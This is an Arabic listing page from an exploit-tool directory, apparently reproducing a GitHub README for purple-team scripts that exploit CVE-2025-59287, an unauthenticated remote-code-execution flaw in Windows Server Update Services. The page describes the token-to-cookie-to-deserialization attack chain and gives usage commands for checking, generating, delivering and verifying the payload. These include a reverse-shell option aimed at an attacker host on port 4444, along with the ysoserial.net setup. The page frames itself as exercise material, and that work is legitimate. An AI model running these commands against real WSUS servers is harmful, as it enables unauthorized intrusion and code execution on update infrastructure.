Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59287-Exercise-Use — سكربتات تمرين الفريق الأرجواني التي توضح CVE-2025-59287، وهي RCE غير مصادق عليها في WSUS عبر حقن حمولة إلغاء تسلسل خبيثة في قاعدة بيانات WSUS. | Kitploit
أدوات/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمالفريق الأحمرتطوير الحمولاتمختبرات وتدريب عملي
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

سكربتات تمرين الفريق الأرجواني التي توضح CVE-2025-59287، وهي RCE غير مصادق عليها في WSUS عبر حقن حمولة إلغاء تسلسل خبيثة في قاعدة بيانات WSUS.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59287 — WSUS RCE غير مصادق عليه

نصوص برمجية لتمارين الفريق الأرجواني لـ CVE-2025-59287، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في خدمات تحديث Windows Server (WSUS).

للاستخدام المصرح به فقط. للاستخدام في بيئات تمارين خاضعة للتحكم ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.

كيف يعمل

تستغل الثغرة نقاط نهاية SOAP الخاصة بـ WSUS القابلة للوصول بشكل مجهول لحقن حمولة إلغاء تسلسل خبيثة في قاعدة بيانات WSUS. يتم تنفيذ الحمولة عند فتح وحدة تحكم إدارة WSUS أو عند تشغيل مزامنة.

  1. تصدر خدمة مصادقة WSUS رمزًا صالحًا لأي عميل مجهول
  2. يتم تبادل الرمز للحصول على ملف تعريف ارتباط لجلسة الإبلاغ عبر خدمة الويب للعميل
  3. يتم حقن كائن متسلسل خبيث في قاعدة بيانات WSUS عبر خدمة الإبلاغ
  4. يتم تنفيذ الحمولة عند تحميل وحدة تحكم WSUS أو عند حدوث حدث مزامنة

المتطلبات

  • جهاز هجوم يعمل بنظام Windows مع PowerShell 5.1+
  • وصول شبكة إلى WSUS على المنفذ 8530
  • وضع ysoserial.net في مجلد ysoserial\Release\ (انظر الإعداد)

هيكل المستودع

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

الإعداد

قم باستنساخ المستودع أو تنزيله. أضف ysoserial.net بحيث يطابق المسار ysoserial\Release\ysoserial.exe.

قم بتنزيل ysoserial.net من: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 سيؤدي هذا إلى تشغيل Windows Defender افتراضيًا

الاستخدام

قم بتشغيل جميع النصوص البرمجية من جذر المستودع.

1 — الفحص

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — التوليد

إسقاط ملف (لا حاجة لمستمع، موصى به أولًا):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

قشرة عكسية:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — التسليم

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — التشغيل

على خادم WSUS افتح وحدة التحكم الإدارية عبر Start > Windows Server Update Services، أو قم بتشغيل مزامنة عبر PowerShell:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — التحقق والتنظيف

التحقق من التنفيذ:

root@kitploit:~
.\4-verify.ps1

التحقق وتنظيف جميع القطع الأثرية:

root@kitploit:~
.\4-verify.ps1 -Cleanup

من جهاز الهجوم عبر مشاركة إدارية:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

بعد التنظيف، قم بإزالة جهاز التمرين من وحدة تحكم WSUS ضمن Computers.

فرص الكشف

المراجع

  • CVE-2025-59287 — البحث الأصلي: hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
تنزيل الأداة